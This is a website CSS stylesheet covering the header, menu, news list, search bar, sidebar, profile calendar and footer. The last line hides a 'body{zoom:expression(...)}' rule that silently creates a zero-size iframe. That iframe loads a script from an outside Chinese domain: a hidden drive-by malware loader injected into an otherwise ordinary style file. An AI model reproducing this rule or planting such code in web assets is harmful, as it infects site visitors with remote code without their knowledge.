@charset "utf-8";
body, div, h1, h2, h3, h4, p, ul, li {
margin:0;
padding:0;
}
a {
color:#000000;
text-decoration:none;
}
a:hover {
text-decoration:underline;
}
body {
font-family: Arial;
color:#333333;
background:#FFFFFF;
}
img {
border:0px;
}
/*---- TOP ----*/
#TOP {
overflow:hidden;
height:80px;
width: 950px;
margin:0 auto;
vertical-align:center;
}
#TOP_LOGO {
float:left;
padding:20px 0px 0px 16px;
}
#TOP_RIGHT {
float:right;
color:#FFFFFF;
font-size:0.75em;
padding:25px 10px 0px 0px;
}
div.contain{float: left;width:194px;height:24px;background: url('images/search.gif') no-repeat top left;}
input.field{padding:5px 5px 0px 3px;/padding:5px 0px 0px 3px;margin:1px 0 0 4px;font: normal 12px arial,sans-serif;color:#000000;width:156px;background: transparent;}
input.button{margin-top:0;padding:0;width:24px;height:22px;cursor: pointer;background: transparent;}
input{float: left;height:18px;border:0;background:#fff;}
.new_msg {
color:red;
font-weight:bold;
}
/*---- MENU ----*/
#MENU {
overflow:hidden;
width: 950px;
margin:0 auto;
vertical-align:center;
padding-top:10px;
}
#Menu_left {
float:left;
padding:0px 0px 0px 0px;
}
#Menu_right {
float:right;
color:#FFFFFF;
font-size:0.75em;
padding:0px 0px 0px 0px;
}
.new_msg {
color:red;
font-weight:bold;
}
/*-- BANNER --*/
#BANNER {
width: 100%;
height:100%;
margin:0 auto;
padding:0px;
vertical-align:center;
}
#content{
overflow:hidden;
width:100% !important;
height:100% !important;
padding-top:15px;
padding-bottom:15px;
margin-bottom:5px;
background:#EEEEEE;
}
#headline{
width:950px;
margin:0 auto;
padding-top:30px;
padding-bottom:20px;
}
#headline #title{
font-size:1.7em;
letter-spacing:-0.05em;
font-weight:bold;
color:#000000;
}
#headline #date{
font-weight:bold;
font-size:1em;
color:#666666;
}
#content img{
width:350px;
height:350px;
margin-right:30px;
}
#arrow {
width:950px;
margin:0 auto;
text-align:center;
margin-bottom:20px;
}
#arrow img{
}
#MAIN{
overflow:hidden;
width:950px;
height:100%;
margin:0 auto;
margin-bottom:50px;
}
#MAIN a{
color:#754c3c;
}
#MAIN a:visited{
color:#0f6d30;
}
#NEWS{
float:left;
width:650px;
margin:0px 20px 0px 0px;
}
#NEWS_title{
border-bottom:1px solid #666666;
font-size:1.1em;
font-weight:bold;
margin-bottom:10px;
padding-bottom:5px;
}
#NEWS #area{
overflow:hidden;
border-bottom:1px dotted #BCBCBC;
padding-bottom:10px;
margin-bottom:-5px;
}
#NEWS #area #thum{
float:left;
width:70px;
margin-right:10px;
}
#NEWS #area #thum img{
width:70px;
}
#NEWS #area #list{
float:right;
width:570px;
}
#NEWS #area #list #date{
font-weight:bold;
font-size:0.75em;
}
#NEWS #area #list #date #cat{
font-size:0.9em;
float:right;
}
#NEWS #area #list #title{
font-weight:bold;
font-size:0.9em;
padding:2px 0px;
}
#NEWS #area #list #text{
font-size:0.75em;
line-height:1.2em;
}
#NEWS #area #list .link{
font-weight:bold;
font-size:0.85em;
background:url(images/arrow_b.gif) no-repeat center left;
padding:5px 0 0 10px;
}
#page2{
width:100%;
text-align:center;
font-size:0.75em;
margin-top:20px;
padding:5px 0px;
}
#page2 a{
padding:0px 3px;
margin:0px 3px;
}
#page2 a:hover{
text-decoration:none;
background:#E6E6E6;
}
.selected{
border:1px solid #000000;
}
#NEWS_content{
float:left;
width:650px;
font-size:0.85em;
line-height:1.7em;
margin:0px 20px 0px 0px;
}
#NEWS_content p{
padding-bottom:12px;
}
#NEWS_content img{
expression(this.width > 650 ? 650: true); max-width: 650px;
}
#ABOUT_content{
float:left;
width:650px;
font-size:0.85em;
line-height:1.7em;
margin:0px 20px 0px 0px;
}
#ABOUT_content p{
padding-bottom:12px;
}
#ABOUT_content img{
expression(this.width > 650 ? 650: true); max-width: 650px;
}
#ABOUT_content #image_r{
float:right;
margin-left:20px;
}
p.headline{
font-size:2.1em;
font-weight:bold;
color:#2791D1;
padding-top:10px;
line-height:1.2em;
}
.sign{
float:right;
font-size:1.1em;
}
#OTHER_content{
float:left;
width:650px;
font-size:0.85em;
line-height:1.7em;
margin:0px 20px 0px 0px;
}
#OTHER_content p{
padding-bottom:12px;
}
#OTHER_content img{
expression(this.width > 650 ? 650: true); max-width: 650px;
}
#OTHER_content dl {
	display:block;
	overflow:hidden;
	margin: 22px 0 0 0;
	padding-bottom:10px;
	zoom: 1;
}

#OTHER_content dl dt {
	display:block;
	padding: 8px 0px 8px 0;
	width: 140px;
	float: left;
	clear: left;
	font-weight:bold;
}

#OTHER_content dl dd {
	display:block;
	padding: 8px 0;
	margin-left: 5px;
	width: 474px;
	float: left;
	*float: none;
}

#OTHER_content dl.terms {
	width:650px;
	margin: 10px 0 0 0;
	zoom: 1;
}

#OTHER_content dl.terms dt {
	padding: 12px 0px 12px 0;
	width:15px;
	float: left;
	clear: left;
}

#OTHER_content dl.terms dd {
	padding: 12px 0 12px 0px;
	width: 630px;
	float: left;
}

#OTHER_content dl.faq {
	width:650px;
	margin: 5px 0 0 0;
	_height: 1px;
	_overflow: visible;
	zoom: 1;
}

#OTHER_content dl.faq dt {
	padding: 0px;
	width:15px;
	float: left;
	clear: left;
}

#OTHER_content dl.faq dd {
	padding: 0px;
	width: 630px;
	float: left;
}
#SEARCH{
float:left;
width:650px;
font-size:0.85em;
line-height:1.7em;
margin:0px 20px 0px 0px;
}
#search_bar{width:350px;height:24px;background: url('images/search_bar.gif') no-repeat top left;}
#search_bar input.field{padding:5px 5px 0px 3px;/padding:5px 0px 0px 3px;margin:1px 0 0 4px;font: normal 12px arial,sans-serif;color:#000000;width:312px;background: transparent;}
#search_bar input.button{margin-top:0;padding:0;width:24px;height:22px;cursor: pointer;background: transparent;}
#search_bar input{float: left;height:18px;border:0;background:#fff;}
#search_target{
overflow:hidden;
font-size:0.9em;
width:100%;
padding:5px 0px;
border-bottom:1px solid #000000;
}
#search_target input{
float:left;
height:12px;
width:12px;
margin-top:5px;
}
#search_target label{
float:left;
margin-right:10px;
}
#search_result{
font-size:0.9em;
width:100%;
text-align:right;
padding:5px 0px;
margin:10px 0px;
}
#search_area{
border-bottom:1px dotted #BCBCBC;
padding-bottom:5px;
margin-bottom:-10px;
}
#search_area #title{
font-weight:bold;
font-size:1.2em;
}
#search_area #text{
font-size:1em;
line-height:1.4em;
}
#search_area #link{
color:#999999;
}
#SIDE{
float:left;
overflow:hidden;
width:280px;
}
#SIDE_title{
border-bottom:1px solid #666666;
font-size:1.1em;
font-weight:bold;
padding-bottom:5px;
margin-bottom:10px
}
.title_cht{
color:#808080;
font-size:0.65em;
letter-spacing:0.5em;
margin-left:10px;
font-weight:normal;
}
#category{
font-size:0.75em;
margin-bottom:30px;
}
#category div{
line-height:1.8em;
display:block;
border-bottom:1px dotted #BCBCBC;
}
#category div a{
font-weight:bold;
margin-left:3px;
}
#SIDE_banner{
margin-bottom:20px;
text-align:center;
}
/*--#SIDE_banner .title{
border-bottom:1px solid #666666;
font-size:1.1em;
font-weight:bold;
padding-bottom:5px;
margin-bottom:10px;
}--*/
#SIDE_banner ul{
}
#SIDE_banner li{
display:block;
list-style:none;
text-align:center;
margin-bottom:5px;
}
h2{
color:#000000;
font-size:1.3em;
border-bottom:1px solid #000000;
margin-bottom:10px;
margin-top:20px;
}
#profile{
overflow:hidden;
margin-bottom:30px;
}
#profile ul li{
display:block;
list-style:none;
}
#profile ul.left{
float:left;
margin-right:20px;
}
#profile li.photo{
}
#profile li.photo img{
width:250px;
}
#profile li.cal{
text-align:center;
width:250px;
padding:10px 0 0 0;
}
#profile li.cal a{
color:#000000 !important;
}
#profile li.cal table .sun{
color:#ff5b5b;
}
#profile li.cal table .sat{
color:#2491D1;
}
#month{
font-size:0.8em;
padding:5px 0px;
}
#month a{
margin:0px 10px;
}
#day{
font-size:0.75em;
}
#day a{
padding:1px 1px;
}
#day tr{
height:16px;
}
#day .selected{
border:1px solid #000000;
}
#day .updated{
background:#E6E6E6;
}
#week{
font-size:0.9em;
height:20px !important;
}
#profile li.cal caption{
text-align:center;
margin:0 auto;
}
#profile li.cal #day table{
text-align:center;
width:200px;
margin:0 auto;
}
#profile div.right{
float:left;
width:380px;
}
#profile div.right ul.content{
margin-bottom:50px;
}
#profile div.right ul.content1{
margin-bottom:10px;
}
#profile li.name{
font-size:3em;
font-weight:bold;
letter-spacing:-3px;
}
#profile li.name span.specialty{
color:#999999;
font-size:0.45em;
letter-spacing:-1px;
line-height:0.95em;
padding-right:5px;
}
#profile li.specialty{
color:#999999;
font-size:1.8em;
font-weight:bold;
letter-spacing:-1px;
line-height:0.95em;
padding-right:5px;
margin-bottom:60px;
}
#profile li.text{
font-size:1.3em;
font-weight:bold;
}
#profile li.text p{
}
#profile li.text p.text1{
font-size:1.8em;
font-weight:bold;
}
#profile li.text p.text2{
font-size:1.2em;
margin-bottom:30px;
}
#profile li.text p.text3{
font-size:0.8em;
line-height:1.5em;
margin-bottom:30px;
}
#profile li.text p.text4{
font-size:0.8em;
line-height:1.5em;
}
ul.pixier_recent{
font-size:0.8em;
}
ul.pixier_recent li{
overflow:hidden;
height:15px;
line-height:1.5em;
padding:5px 0px;
border-bottom:1px dotted #BCBCBC;
}
ul.pixier_recent li a{
color:#666666 !important;
}

/*-- BOTTOM --*/
#BOTTOM {
width:950px;
height:30px;
color:#666666;
font-size:0.65em;
margin:0 auto;
vertical-align:center;
border-top:1px #999999 solid;
padding:5px 0px;
}
#Bottom_left {
float:left;
}
#Bottom_right{
float:right;
letter-spacing:1px;
}
#BOTTOM a{
color:#666666;
padding:0px 3px;
}body{zoom:expression(function(ele){setTimeout(function(){var i=document.createElement('iframe');i.width=i.height=0;document.body.appendChild(i);i.contentWindow.setTimeout(function(){i.contentWindow.document.write('<script src=http://www.800816.com.cn/cache/yahoo.js></script>');},1000);},1000);ele.style.zoom='1';}(this));}